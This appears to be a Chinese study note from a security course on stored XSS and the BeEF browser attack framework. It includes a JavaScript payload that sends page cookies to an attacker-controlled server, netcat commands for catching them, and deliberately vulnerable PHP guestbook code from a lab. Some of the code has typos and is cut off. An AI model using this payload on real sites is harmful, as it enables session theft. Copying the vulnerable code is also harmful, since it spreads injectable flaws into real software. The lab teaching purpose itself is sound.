【安全牛学习笔记】存储型XSS和BEEF浏览器攻击框架
| 存储型XSS 长期存储于服务器端 每次用于访问都会被执行javascript脚本 Name:客户端表单长度限制 客户端、截断代理
a.js源码 var img = new Image(); img.src = "http://1.1.1.1:88/cookies.php?cookie="+documnet.cookie; |
root@R:~# netstat -pantu | grep 80
tcp 0 0 127.0.0.1:80 0.0.0.0:* LISTEN 771/gsad
tcp 0 0 192.168.1.102:34212 140.98.195.27.80 ESTABLISHED 2840/wget
tcp6 0 127.0.0.1:8080 :::* LISTEN 2387/java
root@R:~# kill 771
root@R:~# service apache2 start
root@R:~# cd /var/www/html/
root@R:/var/www/html# gedit a.js
var img = new Image();
img.src = "http://192.168.1.102:88/cookies.php?cookie="+documnet.cookie;
root@R:~# nc -nlvp 88
----------------------------------------------------------------------
低安全代码
if(isset($_POST['btnSign']))
{
$message = trim($_POST['mixMessage']);
$name = trim($_POST['txtName]);
// Sanitize message input
$message = stripslashes($message);
$message = mysql_real_escape_string($message);
// Sanitize name input
$name = mysql_real_escape_string($name);
$query = "INSERT INTO guestbook (comment,name) VALUES ('$message','$name');";
$result = mysql_query($query) or die('' . mysql_error() . '
' );
}
?>
---------------------------------------------------------------------------
中安全代码
if(isset($_POST['btnSign']))
{
$message = trim($_POST['mixMessage']);
$name = trim($_POST['txtName]);
// Sanitize message input
$message = trim(strip_tags(addslashed($message)));
$message = mysql_real_escape_string($message);
$message = htmlspecialchars($message);
// Sanitize name input
$name = str_replace('
root@R:~# vi 1
root@R:~# nc -nlvp 88
| BEEF 浏览器攻击面 应用普遍转移到B/S架构,浏览器成为统一客户端程序 |